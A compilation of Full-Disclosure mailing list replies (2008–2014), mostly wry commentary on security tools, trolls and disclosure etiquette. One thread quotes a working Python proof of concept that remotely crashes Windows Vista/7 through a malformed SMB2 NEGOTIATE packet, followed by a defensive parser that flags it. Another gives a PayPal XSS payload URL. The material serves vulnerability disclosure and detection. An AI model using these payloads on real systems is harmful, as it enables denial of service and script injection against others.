Re: [Full-disclosure] [SPAM] Re: Ektron CMS TakeOver Part (2) - PaylPal-Forward.com demonstration
On 2/4/2014 6:36 PM, Mark Litchfield wrote:
On 2/4/2014 3:13 PM, security curmudgeon wrote:
: This is not the behavior of the site as of 48 hours ago.
: Let me check. Normal registration should also be available? In fact I will remove the registration.
:
: The purpose of this whole registration in the first place was to allow for future postings I am going to make later this week that would only be available to registered users. Not necessarily vulnerabilities, but useful stuff for pentesting. Also all registered users would be given a 48 hours head start on any new vulnerabilities that I post in the future.

Which is great, but I strongly recommend you allow a site-specific registration for such purposes. Giving up one of the two dominant social media accounts for it is excessive.

I should add, I am all for constructive criticism. But a public forum is not really the place. Feel free to email me directly.

Yes, it is. This is a security forum. Your authentication mechanism is a major security issue. The damn thing should get its own CVE. Think about it and you'll see the point.

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] INSECT Pro - Free tool for pentest - New version release 2.7
On 8/28/2011 6:52 PM, Juan Sacco wrote:
This isn't a company making a big product, I'm doing this because I like doing it.

Good for you. I think that is great. But you are pretending to be a big company. Stop that. I am happy to see you removed that silly donation-for-download scheme.

I'm not forcing you to use my software, if you don't like it please don't waste bandwidth on it.

Fantastic advice.

We are working on a JAVA version in order to support multi-platform, and because I really like JAVA

I did too, until I learned how to program. Oracle's purchase/murder also hastened my departure. Might I suggest C++/Qt? :-)

Randy
Re: [Full-disclosure] International Master In Computer Security and Cyberwarfare
How can you expect to be taken seriously when your Web site doesn't have pictures of attractive, multi-ethnic women in business attire pointing at holographic displays of random binary digits? Bah!

Randy

On 5/23/2011 10:10 AM, Mastere NIS wrote:
Our master "Network and Information security" (NIS) program is a springboard to a variety of exciting careers in security information ranging from computer network administrator, IT security expert or cyberwarfare expert for the Department of Defense to security officer in charge of the IT security in an international firm.

Through theoretical and practical study, the NIS program will provide you with the skills and knowledge you need to work in today's fast moving information security landscape. It is the only program of this kind in France as it offers a different and new approach to information security by considering the attacker's view point. This program also offers you insight into advanced study options such as active auditing or cyber warfare techniques and concepts, helping you to choose your career path. Our program emphasizes hands-on, practical training providing you with an additional learning opportunity that is best-suited for real world demands.

The Specialized Master "NIS" is a post-master professional degree called in French "mastère spécialisé". It is a very specialized and highly technical one-year study course taught in English. This program is aimed at international students with a bachelor's degree or equivalent in the following related fields: computer science, computer engineering, applied mathematics. It is open to higher level students and experienced engineers in IT as well.

More information on the homepage https://sites.google.com/site/esieanismaster/ of the International Master.
Re: [Full-disclosure] Stuxnet
On 05/01/2011 01:38 PM, satyam pujari wrote:
*request* Hello FD, Can anyone handle this guy please?

Allow me to spin this broken record again...

Censorship = Bad
E-Mail Filters = Good

Take control of your inbox and don't rely on others!

Randy
Re: [Full-disclosure] SSL Capable NetCat and more
On 3/27/2011 4:29 PM, Dan Tulovsky wrote:
Beside that, scnc is written in pure-Perl, and is easily modifiable by anyone. Such really simple (dumb?) stuff should not be written in low-level languages such as C.

You can't be serious...

Shirley, he is.

Perl is shite. It's a dependency hell, it lacks the logic of C/C++ and is interpreted (as pointed out by others). Any code base can be modifiable by anyone - as long as it is open sourced.

Don't get me wrong, I'm not criticizing the product. I think reinventing the wheel in lesser performing methods is great. Just don't disregard C. To be honest, in my code auditing days, it was SO much easier to find flaws in C/C++ than Perl, because Perl is just messy and ugly. Something looks wrong, but it's right. Uggh! But if you need to write something quick for an easy task, by all means, hit the Perl.

It's like using Java to write large scale enterprise products. Who the hell? Why? Portability is nice, but performance is better. Java belongs in the small-scale realm of applications.

Grumble grumble. Get off my lawn. Back to the lair :-)

Randy
Re: [Full-disclosure] Your email message was blocked
On 3/30/2011 11:31 PM, r...@bellaliant.ca wrote:
The following email message was *blocked* by Bell Aliant Content Filtering Device:
*From:* ra...@procyonlabs.com
*To:* peter.mo...@bellaliant.ca
*Subject:* Re: [Full-disclosure] SSL Capable NetCat and more
*Message:* B4d93f5990001.0001.0003.mml
Because it may contain *unacceptable language*, or *inappropriate material*. Please remove any unacceptable or inappropriate language and resend the message. The blocked email will be automatically deleted after *5 days.*
Content Rule: Policy Management (Inbound) : Block Common Mild Profanity
r...@bellaliant.ca

F**K YOU. Here's a nickel - get yourself a real mail server.

Randy

--
Disclaimer: By sending an email to ANY of my addresses you are agreeing that:
1. I am, by definition, the intended recipient
2. All information in the email is mine to do with as I see fit
3. I will take the contents as representing the views of your company
4. If your email is an Out of Office reply on a mailing list, I will social engineer your company
5. This notification overrides any disclaimer or statement of confidentiality that may be included on your message
Further, you understand that if any of the following conditions are met that you are indeed, a bag of douche:
1. Your message identifies the device you sent it from
2. You messed up the thread by top-posting
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
On 3/29/2011 9:13 PM, runlvl wrote:
Insecurity Research is happy to announce the release of version 2.5, get it now while it's still hot!
Insect Pro 2.5 is a penetration security auditing and testing software solution designed to allow organizations of all sizes mitigate, monitor and manage the latest security threats vulnerabilities. We're always working to improve Insect Pro and now the users obtain a new feature: A fully automated active web application security reconnaissance tool. Check it out: http://www.youtube.com/watch?v=ifiyHem7fMA
We invite you to take a visual tour where you can find screenshots and videos, visit us now at http://www.insecurityresearch.com
There is no fixed price to get a copy, you can obtain the full version by making a minimum donation to keep us coding. We are really thankful with the community!

I keep getting this error when trying to download:

Please enter an amount greater than zero.

Can you fix that so I can test out the software. I'm really curious about how much code was lifted from other projects.

Nice logo though!

Thanks,
Randy
Re: [Full-disclosure] INSECT Pro 2.5 Release - Web scanner tool
On 3/29/2011 9:13 PM, runlvl wrote:
Insecurity Research is happy to announce the release of version 2.5, get it now while it's still hot!
snip

Oh! And you list the Dept. of Energy as a customer. I used to work there, and still talk to a lot of the security offices for various locations. They've never heard of it. Also, did you get clearance from the DoE's Office of Public Affairs to list them as a customer? They get touchy about that sort of stuff.

Randy
Re: [Full-disclosure] from hbgary: stuxnet, WL attack, Psyop and Anonymous trackdown
Thought this would be appropriate :-)
http://xkcd.com/149/

On 2/15/2011 4:00 PM, Eyeballing Weev wrote:
What do you expect from a woman? Rebecca, kindly make me a sandwich

On 02/15/2011 03:44 PM, Cal Leeming [Simplicity Media Ltd] wrote:
I did apologise, no need to drag it out into the yard and beat it with a stick lol.
Re: [Full-disclosure] OpenBSD Paradox
On 12/15/2010 5:00 PM, BMF wrote:
2010/12/15 musnt live musntl...@gmail.com:
What is this time to stop the press!

This fake broken English schtick is really stupid and annoying. Knock it off. In the meantime you are kill filed. I suggest everyone else do the same as nothing useful has ever come of this person.

First, obligatory: http://www.pulledbyakite.com/funnypics/s_troll.jpg

Second, if you can't take a joke: http://www.pulledbyakite.com/funnypics/gtfoti.png

Now let's hug and move on.

Randy
Re: [Full-disclosure] Windows is 100% self-modifying assembly code?(Interesting security theory)
On 12/10/2010 10:10 AM, John Horn wrote:
Is this a joke?
--
John Horn
City of Tucson, IT Department
Network Services (Network security)
Phone: (520) 837-6036
--
CONFIDENTIALITY NOTICE: If you have received this email in error, please immediately notify the sender by e-mail at the address shown. This email transmission may contain confidential information. This information is intended only for the use of the individual(s) or entity to whom it is intended even if addressed incorrectly. Please delete it from your files if you are not the intended recipient. Thank you for your compliance, time and attention to this matter.
snip

A top-post, bogus legal notice AND an office phone #. Social engineers - unite! Might want to think about that a little.

And if you have to ask whether something is a joke, then the troll was successful.
Re: [Full-disclosure] Paypal XSS Vulnerability - Resolved
I find it humorous that an organization that pretends to be a bank and regularly steals money from its members has the balls to distribute a PayPal Responsible Disclosure Policy. Good luck with that.

Randy

On Fri, March 26, 2010 10:49 pm, Orbeton, Jon wrote:
All:
The XSS vulnerability reported below was addressed at approximately 17:45 PDT today. For information about how to report security issues to PayPal, please refer to the PayPal Responsible Disclosure Policy documented here:
https://www.paypal.com/cgi-bin/webscr?cmd=xpt/cps/securitycenter/general/ReportingSecurityIssues-outside
Site security issues should be reported to: sitesecur...@paypal.com
All reports will be handled professionally and quickly. A PGP key is available at the URL above.
Thanks,
Jon Orbeton
PayPal, an eBay Company

From: Wesley Kerfoot wjak56 () gmail com
Date: Fri, 26 Mar 2010 15:46:09 -0400
Paypal is affected by an XSS vulnerability where it fails to validate input for the following url:
https://www.paypal.com/xclick/business=
One can add arbitrary javascript with no need for any filter evasion.
https://www.paypal.com/xclick/business=<script>alert(xss);</script>
As far as I know only the above url is affected. All of the usual XSS attacks will work with this.
Cheers.
Re: [Full-disclosure] SecurityFocus to partially shut down
On Fri, March 12, 2010 1:45 pm, Michal Zalewski wrote:
http://www.securityfocus.com/news/11582

While the news portal section of SecurityFocus will no longer be offered, we think our readers will be better served by this change as we combine our efforts with Symantec Connect and continue to provide a valuable service to the community.
http://www.symantec.com/connect/

In other words, RIP :-/

Who didn't see this coming? Symantec... OM NOM NOMMING companies since 1984.

Randy
Re: [Full-disclosure] How I become Vice President of Security at Yahoo! 1999-2005.
Decent attempt at trolling. Some beginner mistakes, but the message was relayed as intended (I'm sure). Comments inline.

On Fri, February 19, 2010 6:45 pm, John Q Public wrote:
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Greetings. I've been holding this one back for a while. It's been eating at my skin. I was just an intern at the time, but I'd get the mail, copy the text, delete his mail, and send the mail to my supervisor, authored by me.

Clarify the type of mail - it adds texture to the troll.

I still remember the friendships I made at Yahoo. The cute girlfriends I have and how it changed my life. I remember I was just some office kid opening up emails in outlook 2000. But I've risen to be so much more. This mysterious person helped me do it.

Perhaps some reflection on the type of assistance? Also, Yahoo! employees do not have cute girlfriends.

Eventually, I was promoted up Vice President of Security at Yahoo! and made nearly six figures a year.

The salary figure is off. Take into consideration the role, size of organization and geographical location. Then again, the experience you detailed would possibly justify this low figure.

This is what I did. And I told no one. All I know is there is a kid whose advice I took credit for and he is the key factor for my success in life. I live in a $500k condo in Mountain View. Wife, 2 kids, and a Lexus (2009 Hybrid, Italian leather seats, TV in backseat for the kids).

That amount in Mountain View would get you 20x20 in someone's basement. Also, they don't make seats with the skin of Italian people. Some ethical thing.

I just wanted to let you know that the security tips helped. I feel pretty guilty for flat out taking credit for all his work though. I just had to get it off my chest. Thank you so much, if you read this list. You've touched my life.
-BEGIN PGP SIGNATURE-
Charset: UTF8
Note: This signature can be verified at https://www.hushtools.com/verify
Version: Hush 3.0

Hmm. Must be legit. It's signed!

Okay, break time is over. Back to code monkeying.

Randy
Re: [Full-disclosure] Peiter Mudge Zatko petition to be named U.S. Cybersecurity Chief
The Sp3ctacle wrote:
http://www.ipetitions.com/petition/mudge4cyberczar/index.html
This petition is posted in support for the nomination of Peiter Zatko (aka mudge) to the President's post of Cybersecurity Chief. We've all seen how effective past efforts have been regarding this initiative, and realize the importance of nominating someone who understands not only all facets of cybersecurity, but has garnered the respect of both peers and adversaries in the space.
Dr. Zatko's bio is available at: http://en.wikipedia.org/wiki/P... and http://www.allbusiness.com/gov...

Yeah, because if it is one thing he wants, it is a powerless figurehead position of bureaucracy and politics. There is a reason why nobody stays in the high level (US) information security roles for long.

Randy
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
It's fun :-)

On Mon, September 14, 2009 12:14 pm, D-vice wrote:
You wrote an exploit in java *head explodes*

On Mon, Sep 14, 2009 at 6:02 AM, Randal T. Rioux ra...@procyonlabs.com wrote:
After testing my version of the exploit (using Java instead of Python) I tried it against a Windows Server 2008 R2 installation - it went down.
http://www.procyonlabs.com/software/smb2_bsoder
Randy

laurent gaffie wrote:
Advisory updated:
=
- Release date: September 7th, 2009
- Discovered by: Laurent Gaffié
- Severity: High
=

I. VULNERABILITY
- Windows Vista, Server 2008 R2, 7 RC : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.

II. BACKGROUND
- Windows Vista and newer Windows versions come with a new SMB version named SMB2. See http://en.wikipedia.org/wiki/Windows_Vista_networking_technologies#Server_Message_Block_2.0 for more details.

III. DESCRIPTION
- [Edit] Unfortunately this SMB2 security issue is specifically due to a MS patch for another SMB2.0 security issue: KB942624 (MS07-063). Installing only this specific update on Vista SP0 creates the following issue: SRV2.SYS fails to handle malformed SMB headers for the NEGOTIATE PROTOCOL REQUEST functionality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to a SMB server, and it's used to identify the SMB dialect that will be used for further communication.

IV. PROOF OF CONCEPT
- Smb-Bsod.py:

    #!/usr/bin/python
    # When SMB2.0 receives a char in the Process Id High SMB header field
    # it dies with a PAGE_FAULT_IN_NONPAGED_AREA error
    from socket import socket

    host = IP_ADDR, 445   # IP_ADDR is the advisory's placeholder for the target address
    buff = (
        "\x00\x00\x00\x90"  # Begin SMB header: Session message
        "\xff\x53\x4d\x42"  # Server Component: SMB
        "\x72\x00\x00\x00"  # Negotiate Protocol
        "\x00\x18\x53\xc8"  # Operation 0x18 sub 0xc853
        "\x00\x26"          # Process ID High: -- :) normal value should be "\x00\x00"
        "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
        "\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
        "\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
        "\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
        "\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
        "\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
        "\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
        "\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
        "\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
        "\x30\x30\x32\x00"
    )
    s = socket()
    s.connect(host)
    s.send(buff)
    s.close()

V. BUSINESS IMPACT
- An attacker can remotely crash any Vista/Windows 7 machine with SMB enabled. Windows XP, 2k are NOT affected as they don't have this driver.

VI. SYSTEMS AFFECTED
- [Edit] Windows Vista All (64b/32b|SP1/SP2 fully updated), Win Server 2008 R2, Windows 7 RC.

VII. SOLUTION
- No patch available for the moment. Close SMB feature and ports until a patch is provided. Configure your firewall properly. You can also follow the MS Workaround: http://www.microsoft.com/technet/security/advisory/975497.mspx

VIII. REFERENCES
- http://www.microsoft.com/technet/security/advisory/975497.mspx
- http://blogs.technet.com/msrc/archive/2009/09/08/microsoft-security-advisory-975497-released.aspx

IX. CREDITS
- This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
- September 7th, 2009: Initial release
- September 11th, 2009: Revision 1.0 release

XI. LEGAL NOTICES
- The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information.

XII. Personal Notes
- Many persons have suggested to update this advisory for RCE and not BSOD: It won't be done; if they find a way to execute code, they will publish their advisory.
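An added example for readers of this thread, not part of Laurent's advisory or of any post above: a small Python 3 parser for the NetBIOS-framed SMB1 NEGOTIATE request that the PoC sends, which pulls out the header fields and flags the non-zero Process ID High value the advisory names as the trigger. This is the kind of check you would run over captured port-445 traffic to tell whether the crash traffic is on your wire. ADVISORY_PACKET is the PoC's byte string copied from the advisory above; NORMAL_PACKET, the function names and the finding text are constructed for this example and are not from the advisory.

```python
# Added example (not the advisory's code): parse the NetBIOS-framed SMB1
# NEGOTIATE request from the PoC and flag the non-zero Process ID High field
# that the advisory identifies as the SRV2.SYS crash trigger.
import struct

SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72

# Fixed 32-byte SMB1 header that follows the 4-byte NetBIOS session header:
# magic, command, status, flags, flags2, pid_high, security_features,
# reserved, tid, pid, uid, mid (multi-byte integers are little-endian).
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")


def parse_smb1_request(packet: bytes) -> dict:
    """Return the SMB1 header fields and, for NEGOTIATE, the dialect list."""
    if len(packet) < 4 + SMB1_HEADER.size:
        raise ValueError("packet too short for NetBIOS + SMB1 header")
    if packet[0] != 0x00:
        raise ValueError("not a NetBIOS session message")
    nb_len = int.from_bytes(packet[1:4], "big")
    if nb_len != len(packet) - 4:
        raise ValueError("NetBIOS length %d does not match payload %d"
                         % (nb_len, len(packet) - 4))
    (magic, command, status, flags, flags2, pid_high, _security, _reserved,
     tid, pid, uid, mid) = SMB1_HEADER.unpack_from(packet, 4)
    if magic != SMB_MAGIC:
        raise ValueError("bad SMB magic %r" % magic)

    # Parameter block: WordCount, WordCount 16-bit words, then ByteCount and
    # ByteCount data bytes (the dialect list for NEGOTIATE).
    body = packet[4 + SMB1_HEADER.size:]
    word_count = body[0]
    bc_off = 1 + 2 * word_count
    byte_count = struct.unpack_from("<H", body, bc_off)[0]
    data = body[bc_off + 2:bc_off + 2 + byte_count]
    if len(data) != byte_count:
        raise ValueError("ByteCount exceeds packet")

    dialects = []
    if command == SMB_COM_NEGOTIATE:
        # Each dialect entry is 0x02 followed by a NUL-terminated ASCII string.
        for entry in data.split(b"\x00"):
            if entry.startswith(b"\x02"):
                dialects.append(entry[1:].decode("ascii", "replace"))
    return {"command": command, "status": status, "flags": flags,
            "flags2": flags2, "pid_high": pid_high, "tid": tid, "pid": pid,
            "uid": uid, "mid": mid, "dialects": dialects}


def flag_negotiate(packet: bytes) -> list:
    """Findings for the advisory's trigger: a NEGOTIATE with PIDHigh != 0."""
    hdr = parse_smb1_request(packet)
    findings = []
    if hdr["command"] == SMB_COM_NEGOTIATE and hdr["pid_high"] != 0:
        findings.append("NEGOTIATE with non-zero PIDHigh 0x%04x "
                        "(SMB2 NEGOTIATE crash trigger, MS advisory 975497)"
                        % hdr["pid_high"])
    return findings


# The PoC's byte string, copied from the advisory above: PIDHigh is 0x2600
# (bytes 00 26) where a normal client sends 00 00.
ADVISORY_PACKET = (
    b"\x00\x00\x00\x90"
    b"\xff\x53\x4d\x42"
    b"\x72\x00\x00\x00"
    b"\x00\x18\x53\xc8"
    b"\x00\x26"
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
    b"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
    b"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
    b"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
    b"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
    b"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
    b"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
    b"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
    b"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
    b"\x30\x30\x32\x00"
)

# Constructed for this example: the same request with PIDHigh zeroed, which
# is what a well-formed client's NEGOTIATE looks like.
PIDHIGH_OFFSET = 4 + 4 + 1 + 4 + 1 + 2   # NetBIOS, magic, cmd, status, flags, flags2
NORMAL_PACKET = (ADVISORY_PACKET[:PIDHIGH_OFFSET] + b"\x00\x00"
                 + ADVISORY_PACKET[PIDHIGH_OFFSET + 2:])

if __name__ == "__main__":
    for name, pkt in (("advisory PoC", ADVISORY_PACKET), ("normal", NORMAL_PACKET)):
        hdr = parse_smb1_request(pkt)
        print(name, "PIDHigh=0x%04x" % hdr["pid_high"], hdr["dialects"],
              flag_negotiate(pkt) or "clean")
```

Feed it a NetBIOS-framed SMB request pulled from a capture; the PoC's own comment notes that the normal value of the field is 00 00, so a NEGOTIATE carrying anything else is worth an alert whether or not the server behind it is already patched.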
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
Scratch that - the version of 2008 I had wasn't an official R2 release. So original reports still hold. It didn't crash my R2 build 7600.

Laurent, et al, has this been tried against an Itanium machine? Just curious. Nobody at work will let me test the exploit against their Itanium servers.

Randy

On Mon, September 14, 2009 12:02 am, Randal T. Rioux wrote:
After testing my version of the exploit (using Java instead of Python) I tried it against a Windows Server 2008 R2 installation - it went down.
http://www.procyonlabs.com/software/smb2_bsoder
Randy

laurent gaffie wrote:
Advisory updated:
snip
Re: [Full-disclosure] Windows Vista/7 : SMB2.0 NEGOTIATE PROTOCOL REQUEST Remote B.S.O.D.
After testing my version of the exploit (using Java instead of Python) I tried it against a Windows Server 2008 R2 installation - it went down.
http://www.procyonlabs.com/software/smb2_bsoder

Randy

laurent gaffie wrote:
Advisory updated:
snip
Re: [Full-disclosure] Slashdot hacked?
On Thu, July 23, 2009 5:47 pm, Compsec Guy wrote:
What's wrong with Slashdot today?

Nothing.
Re: [Full-disclosure] Black Hat USA Videos available to D/L
On Mon, March 30, 2009 8:14 pm, jmoss wrote:
Hey Full Disclosure,
I am proud to announce that the audio and video from BH USA 2008 is now available for free download, and is in several formats, the first of which is a large, hi-res format with video-sync speaker and presentation:
https://www.blackhat.com/html/bh-usa-08/bh-usa-08-archive.html
snip

.m4v? Really?

Oh Jeff. Nobody uses Macs. We like software freedom. Come back to the DC-stuff mailing list so we can discuss this :-)

Off to start converting videos...

Randy
Re: [Full-disclosure] Microsoft takes 7 years to 'solve' a problem?!
On Tue, November 25, 2008 1:44 am, Memisyazici, Aras wrote:
SSNNIIPP
OK... Maybe I'm going a bit extreme, but WTH?! Am I the only one who is interpreting this, this way? Really? When has releasing a solution to a problem 7 years later ever been acceptable?

May not be acceptable, but it is standard practice with some software companies. They're not closed-source because they care about security. They're closed-source because they're lazy (and/or don't care about anything but quick money).

Randy
Re: [Full-disclosure] n3td3v not a troll
On Mon, September 15, 2008 1:08 pm, n3td3v wrote:
On Mon, Sep 15, 2008 at 5:49 PM, [EMAIL PROTECTED] wrote:
On Mon, 15 Sep 2008 08:09:12 BST, n3td3v said:
n3td3v is outspoken but he's not a troll. he is a serious security researcher with his own mailing list. ... and then someone hurtfully says I'm a troll, what does this mean?

It means that if you don't understand what a troll is,

It means posting inflammatory comments on purpose to get a response, yet I've never done this ever, So I can't be a troll, because I've never purposely set out to post something just to get a reaction. Anything I say is my actual opinion, so accept it or unsubscribe.

It is Full-Disclosure, not Opinion-Disclosure. Sure, you can do it. Just expect the appropriate responses.
Re: [Full-disclosure] security news on cnet???
On Tue, Sep 2, 2008 at 11:07 AM, n3td3v [EMAIL PROTECTED] wrote:
> you've not posted any security news all week, what's going on cnet??? is the journalist that does the security news off ill??? :(
> yours, cnet fan

surely they will cave to pressure from the global powers of the netdev group. i bet there'll be a story up for comment pretty soon now.

randy
Re: [Full-disclosure] DIE IN A FIRE post
On Wed, August 27, 2008 11:34 am, Simon Smith wrote:
> Hi Mike,
> Next time you decide to say something stupid make sure that you do it anonymously.
> Michael C Shirk Home: 4205 Chapel Gate Pl Belcamp, MD 21017-1636 (410) 273-1377
>
> M. Shirk wrote:
>> DIE IN A FIRE !!!1!1!
>> Shirkdog ' or 1=1-- http://www.shirkdog.us

Simon:

A: Because it messes up the order in which people normally read text.
Q: Why is top-posting such a bad thing?
A: Top-posting.
Q: What is the most annoying thing in e-mail?

Shirkdog: Seems we share a state. Ask the evil hacker Simon for my address - come on over. I'll bake a cake.

Randy
Re: [Full-disclosure] simple phishing fix
On Tue, July 29, 2008 2:31 pm, [EMAIL PROTECTED] wrote:
> You might eliminate phishing but there are occasionally messages from people at these institutions also. This sort of thing is in essence allowing phishers a denial of service attack against anyone they choose to make themselves a nuisance with.
> I am not well pleased with any bank authentication I have seen so far personally; seems to me finance-related messages should be authenticated both ways and preferably a confirming authentication to demonstrate the subject agrees with the transaction should be done before such are accepted. That kind of thing would be hard to spoof and if done right pretty useless to someone who could record entire transactions.
> As for email, judge by its content. This posting for example will do nothing to your money, sells you nothing. Nor does it ask any information of you. If it were spoofed it would be harmless.
> Glenn Everhart

But it is from Chase and nothing good comes from Chase ;-)
Re: [Full-disclosure] Panda ActiveScan 2.0 remote code execution
On Fri, July 4, 2008 7:02 am, Panda Security Response wrote:
> Please allow at least one week for us to respond before public disclosure. We only received this information a few days ago.
> Regards,
> --
> Pedro Bustamante
> Senior Research Advisor
> Panda Security

It takes a week to hit the respond button? At least be polite and read your mail, perhaps with a quick "stand by, we're looking into it" response so folks think you care. We are an impatient lot in this community.
Re: [Full-disclosure] Snort Signature to detect credit cards
FYI - http://www.emergingthreats.net

This was discussed on the snort-sigs mailing list back in 2003. Check out http://marc.info/?l=snort-sigs&m=106601612825950&w=2

Also, as Ray mentioned, the Emerging Threats emerging-policy.rules contains some PCRE CC# checks. This will show you some:

$ more emerging-policy.rules | grep Number

Randy

On Thu, May 8, 2008 11:02 pm, Simon Smith wrote:
> You sure you got that URL right?
>
> Ray P wrote:
>> The free rule sets from http://www.emergingthreats.com have this capability. Look in the Policy section.
>> RAy
>>
>> From: [EMAIL PROTECTED]
>> To: full-disclosure@lists.grok.org.uk
>> Date: Thu, 8 May 2008 12:44:15 -0600
>> Subject: [Full-disclosure] Snort Signature to detect credit cards
>>
>> Does anyone have a snort signature to detect credit cards or social security numbers?
>> Thank you in advance,
>> Jeff
>
> --
> - simon
> --
> http://www.snosoft.com
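The thread above asks for a Snort signature for card and SSN numbers and points at the Emerging Threats policy rules, which carry PCRE digit patterns for this. As an added example (not code from the thread, and not the Emerging Threats rule set), here is the same detection logic in Python, run over a few constructed sample lines: a digit-run regex of the kind a Snort PCRE option would carry, followed by a Luhn checksum that removes most numeric false positives, plus a structural check for SSNs. The sample lines, the card test numbers and the SSN values are all constructed for the example; matches are masked before being reported so the alert itself does not leak the value.

```python
import re

# Constructed sample lines for this example (not from the list thread).
# The card numbers are the usual published test numbers, not real accounts.
SAMPLE_LINES = [
    "POST /checkout card=4111111111111111 exp=12/29",          # valid Luhn
    "GET /search?q=order+1234567890123456",                   # 16 digits, fails Luhn
    "note: call back at 555-0199, ref 4111-1111-1111-1112",   # separators, fails Luhn
    "ssn=219-09-9999 alt=123-45-6789 bad=666-12-3456",        # two plausible SSNs, one not
]

# 13-19 digits, optionally separated by single spaces or hyphens, and not
# embedded in a longer digit run. This is the kind of pattern a Snort
# PCRE option would carry; on its own it fires on any long number.
CC_CANDIDATE = re.compile(r"(?<!\d)(?:\d[ -]?){12,18}\d(?!\d)")

# Area-group-serial shape of a US SSN.
SSN_CANDIDATE = re.compile(r"(?<!\d)(\d{3})-(\d{2})-(\d{4})(?!\d)")


def luhn_ok(digits: str) -> bool:
    """Return True if the digit string passes the Luhn checksum."""
    total = 0
    for i, ch in enumerate(reversed(digits)):
        d = int(ch)
        if i % 2 == 1:          # every second digit from the right is doubled
            d *= 2
            if d > 9:
                d -= 9
        total += d
    return total % 10 == 0


def ssn_plausible(area: str, group: str, serial: str) -> bool:
    """Reject values the SSA never issues: area 000/666/900+, group 00, serial 0000."""
    a = int(area)
    return a != 0 and a != 666 and a < 900 and group != "00" and serial != "0000"


def mask_card(digits: str) -> str:
    """Keep only the last four digits so the alert does not carry the full number."""
    return "*" * (len(digits) - 4) + digits[-4:]


def find_card_numbers(line: str) -> list:
    """Return the Luhn-valid card numbers (digits only) found in one line."""
    hits = []
    for m in CC_CANDIDATE.finditer(line):
        digits = re.sub(r"[ -]", "", m.group(0))
        if luhn_ok(digits):
            hits.append(digits)
    return hits


def find_ssns(line: str) -> list:
    """Return the structurally plausible SSNs found in one line."""
    return [m.group(0) for m in SSN_CANDIDATE.finditer(line)
            if ssn_plausible(*m.groups())]


def scan(lines) -> list:
    """Scan lines and return (line_number, kind, masked_value) tuples."""
    findings = []
    for n, line in enumerate(lines, start=1):
        for digits in find_card_numbers(line):
            findings.append((n, "card", mask_card(digits)))
        for ssn in find_ssns(line):
            findings.append((n, "ssn", "***-**-" + ssn[-4:]))
    return findings


if __name__ == "__main__":
    for finding in scan(SAMPLE_LINES):
        print(finding)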
Re: [Full-disclosure] Out of Office AutoReply: Snort Signature to detect credit cards
On Fri, May 9, 2008 4:23 am, West, Bill (USA) wrote:
> I am no longer on-site full time and have limited access to e-mail. I will respond to you as soon as I can. If your issue is an emergency, please use the contacts below.
> Emergencies for MTU Users: Contact Augustin Schuster, +1-860-667-6620
> Emergencies for T-Systems MTU Management: Contact Mike Bouranis, +1-248-276-3459
> Thanks

Folks, it is 2008. Like cell phones, e-mail autoresponders are no longer cool. Use a separate address for mailing lists (like a personal or disposable one) so we don't get bombarded with your junk. Did I mention the social engineering treasures sent around the world with each one? Do you really work in security? Gah!

Randy
[Full-disclosure] netdev threadjack and spam and al-qaeda mi5 underground contacts secrets
On Fri, April 11, 2008 4:41 pm, n3td3v wrote:
> I'm an unemployed working class dude, I'm not part of the industry.

Can one be unemployed and working class at the same time? If one works in security in a capacity to earn an income, would that not automatically place them in the industry?
Re: [Full-disclosure] hacking a pacemaker
On Wed, March 12, 2008 4:57 am, Gadi Evron wrote:
> Almost a year ago I gave a talk at the CCC Camp in Germany I called hacking the bionic man. It even made Wired, in some fashion.
> http://blog.wired.com/27bstroke6/2007/08/will-the-bionic.html
> http://events.ccc.de/camp/2007/Fahrplan/events/2049.en.html
> In the talk, among other things such as the DNA and scripting languages, medical doctors and reverse engineers... was about cybernetic hacking. I gave some predictions, some for 2 years, others 40 years. Some again were pure science fiction.
> I was wrong on the 2 years, it's here.
> Today, this came up in the news (hat tip to Paul Ferguson on the funsec mailing list):
> http://www.nytimes.com/2008/03/12/business/12heart-web.html?_r=1&oref=slogin
